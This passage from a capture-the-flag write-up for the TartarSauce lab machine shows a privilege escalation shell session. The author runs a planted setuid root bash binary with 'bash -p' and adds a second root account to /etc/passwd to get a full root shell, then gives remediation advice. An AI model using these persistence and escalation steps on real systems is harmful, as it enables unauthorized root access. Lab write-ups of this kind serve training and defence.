drwx------  3 root  root    4096 May 12 06:55 systemd-private-c11c7cccc82046a08ad1732e15efe497-systemd-timesyncd.service-QYRKER
drwx------  3 root  root    4096 Oct 29 06:28 systemd-private-d81ab013afe44ca093eb522e178dcde3-systemd-timesyncd.service-rls9tR
drwx------  3 root  root    4096 May 12 06:55 systemd-private-e11430f63fc04ed6bd67ec90687cb00e-systemd-timesyncd.service-PYhxgX
onuma@TartarSauce:/var/tmp$ cd check
cd check
onuma@TartarSauce:/var/tmp/check$ cd var/www/html
cd var/www/html
onuma@TartarSauce:/var/tmp/check/var/www/html$ ls -la
ls -la
total 1092
drwxr-xr-x 2 onuma onuma    4096 Oct 29 13:42 .
drwxr-xr-x 3 onuma onuma    4096 Oct 29 12:57 ..
-rwsr-xr-x 1 root  root  1109564 Oct 29 13:42 bash
onuma@TartarSauce:/var/tmp/check/var/www/html$ bash -p
bash -p
onuma@TartarSauce:/var/tmp/check/var/www/html$ ./bash -p
./bash -p
bash-4.3# id
id
uid=1000(onuma) gid=1000(onuma) euid=0(root) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)

By adding another root user to the /etc/passwd file and switching to this user, we can get a shell with uid and gid 0.

bash-4.3# /bin/su root2                                                                                                                                        
/bin/su root2                                                                  
Password: testing                                                              
                                                                                                                                                               
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory                                            
root@TartarSauce:/var/tmp/check/var/www/html# id                                                                                                               
id                                                                                                                                                             
uid=0(root) gid=0(root) groups=0(root)

Remediation

Vulnerable WordPress plugins should be upgraded to patched versions or removed.

Passwordless sudo privileges should not be provided for execution of the tar binary.

The backuperer script should be configured so as to not allow the opportunity for files to be overwritten by non-privileged users.

Finally, the OS and applications need to be patched and updated to the latest versions where possible, so as to mitigate the risk of other potential exploits.

Creative Commons License
This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.